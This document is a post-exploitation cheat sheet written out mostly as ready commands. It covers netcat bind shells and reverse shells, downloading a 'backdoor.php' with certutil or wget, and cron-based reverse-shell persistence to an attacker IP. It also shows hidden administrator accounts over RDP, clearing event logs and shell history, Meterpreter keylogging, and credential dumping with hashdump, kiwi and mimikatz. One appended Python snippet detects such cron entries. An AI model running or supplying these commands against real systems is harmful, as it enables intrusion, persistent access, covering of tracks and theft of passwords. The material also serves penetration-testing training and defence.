
Post-exploitation essentials


Bind Shell

This type of shell is usually not preferred because the attacker connects directly to the target system, and in most cases ingress traffic to the target is blocked or flagged as suspicious.

# Windows (target)
nc -nvlp <target_port> -e cmd.exe 
nc.exe -nvlp <target_port> -e cmd.exe

# Linux (target)
nc -nvlp <target_port> -e /bin/bash

# Linux (attacker)
nc -nv <target_ip> <target_port>

# Windows (attacker)
nc.exe -nv <target_ip> <target_port>


# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run

Transfer files

# Start web server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
php -S 127.0.0.1:8080

# Download (HTTP Windows)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# Download (HTTP Linux)
wget http://<host>/backdoor.php

# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php         # [recipient]
nc -w 3 <ip> <target_port> < backdoor.php     # [sender]

# With base64
cat file | base64 -w 0 # get base64 [output is a single continuous line]
echo <output_base64> | base64 -d > file # create file

# Tips
# 1 tip - Progress Indicator in netcat
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (install pv)
# 2 tip - Check md5
md5sum backdoor.php

# Note: netcat "-n" option means no DNS (only IP)

[Fully] interactive shell

Interactive shell

/bin/bash -i # Linux

Fully interactive shell

# 1 Step
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'

# 2 Step
CTRL + Z # Press CTRL + Z to background the process and get back to your host machine

# 3 Step
stty raw -echo; fg

# 4 Step
export TERM=xterm

Automatic

# https://github.com/brightio/penelope
# Currently only Unix shells are fully supported. 
# There's basic support (netcat-like interaction + logging)

./penelope.py <port>               # Reverse shell
./penelope.py -c <target> <port>   # Bind shell

Persistence

Windows

(1) Metasploit module: search for a persistence module (Windows). Example: exploit/windows/local/persistence_service (requires admin or SYSTEM privileges). When you want to connect again, set up a listener to receive the connection.

(2) Enable RDP

  • First way with metasploit: search enable_rdp (and set session). Then connect to victim.
Note: you need a username and password. If you don't have the password, change it with net user <username> <new_pass> (suspicious in a real environment), crack the NTLM hash, or create a new account and add it to the Administrators group.
  • Second way with metasploit/meterpreter (auto create account and settings):
# In meterpreter
run getgui -e -u user_you_want -p password_you_want

# This enables rdp service -> 
# Creates new user with the provided parameters -> 
# Hides user from windows login screen -> 
# Adds user to Remote Desktop Users and Administrators group

Linux

(1) Metasploit: search for a persistence module (Linux). Example: post/linux/manage/sshkey_persistence (requires elevated privileges; this module adds an SSH key to a specified user).

(2) Via SSH key: after gaining access to the Linux system, you can transfer an SSH private key to your local machine and use it to connect via SSH.

(3) With cron jobs

# 1. Set up listener
# 2. Create a cronjob (every minute time format)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron 
# 3. This will replace the user's existing crontab with the contents of 'cron'
crontab cron

# Crontab for the current user
crontab -l 
# NOTE: if the command doesn't work try with another revshell
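From the defender's side, the cron persistence above leaves a recognisable artefact: an every-minute crontab entry whose command redirects an interactive shell to /dev/tcp or to netcat. The following is an added example, not part of the original cheat sheet, that parses a constructed crontab and flags such entries; the sample lines and the 203.0.113.10 address are made up for the demonstration.

```python
import re

# Constructed sample crontab (not from a real host): two benign entries and
# one every-minute reverse-shell entry of the kind shown in the cron section.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'
*/5 * * * * /usr/local/bin/healthcheck --quiet
"""

# Indicators that a cron command spawns an interactive shell toward a network socket.
REVSHELL_PATTERNS = [
    (r"/dev/tcp/", "bash /dev/tcp redirection"),
    (r"\bbash\s+-i\b", "interactive bash"),
    (r"\bnc(\.exe)?\b[^\n]*\s-e\s", "netcat -e"),
]

def parse_crontab(text):
    """Yield (schedule, command) for each non-comment crontab line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue
        yield " ".join(fields[:5]), fields[5]

def find_suspicious_cron(text):
    """Return a list of findings as (schedule, command, [reasons])."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = [why for pat, why in REVSHELL_PATTERNS if re.search(pat, command)]
        if schedule == "* * * * *":
            reasons.append("runs every minute")
        # Report only when a network-shell indicator is present; an every-minute
        # schedule on its own is common for legitimate jobs.
        if any(why != "runs every minute" for why in reasons):
            findings.append((schedule, command, reasons))
    return findings

if __name__ == "__main__":
    for schedule, command, reasons in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f"[ALERT] '{schedule}' {command}\n        reasons: {', '.join(reasons)}")
```

Running it against the output of `crontab -l` for each user (and /etc/cron.d) turns the persistence step above into a check that can be scheduled or fed into a SIEM.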

Clearing tracks

Windows

# Metasploit/Meterpreter
clearev  # Clear the Application, System, and Security logs on a Windows system

Linux

history -c                          # Clear history
cat /dev/null > ~/.bash_history     # Same as above

Keylogger

# With metasploit
keyscan_start          # Start keylogger
keyscan_dump print     # Captured strokes

Credential Dumping

Windows

Prerequisites: the user must be a member of the local Administrators group.

(1) hashdump (Metasploit - Meterpreter)

# You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process
migrate <PID explorer.exe>
hashdump

(2) Kiwi (Metasploit - Meterpreter)

# You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process
migrate <PID explorer.exe>

load kiwi
# Retrieve all credentials (parsed)
creds_all 
# NTLM hashes for all of the user accounts on the system
lsa_dump_sam
# Find the clear text passwords
lsa_dump_secrets
# Note: from Windows 8.0 onward, Windows does not store plaintext passwords,
# so this is mainly useful on older versions of Windows.

(3) Mimikatz

  1. Upload mimikatz.exe

  2. Execute mimikatz.exe

The first command you should run to get debug rights is:

privilege::debug

This should be standard practice when running mimikatz, as it enables the SeDebugPrivilege access right required by commands such as sekurlsa::logonpasswords and lsadump::sam.

This should return Privilege '20' OK.

  3. Find the clear text passwords
sekurlsa::logonpasswords
  4. Extract the NTLM hashes from the SAM. You must first run token::elevate to elevate to SYSTEM user privileges
token::elevate

lsadump::sam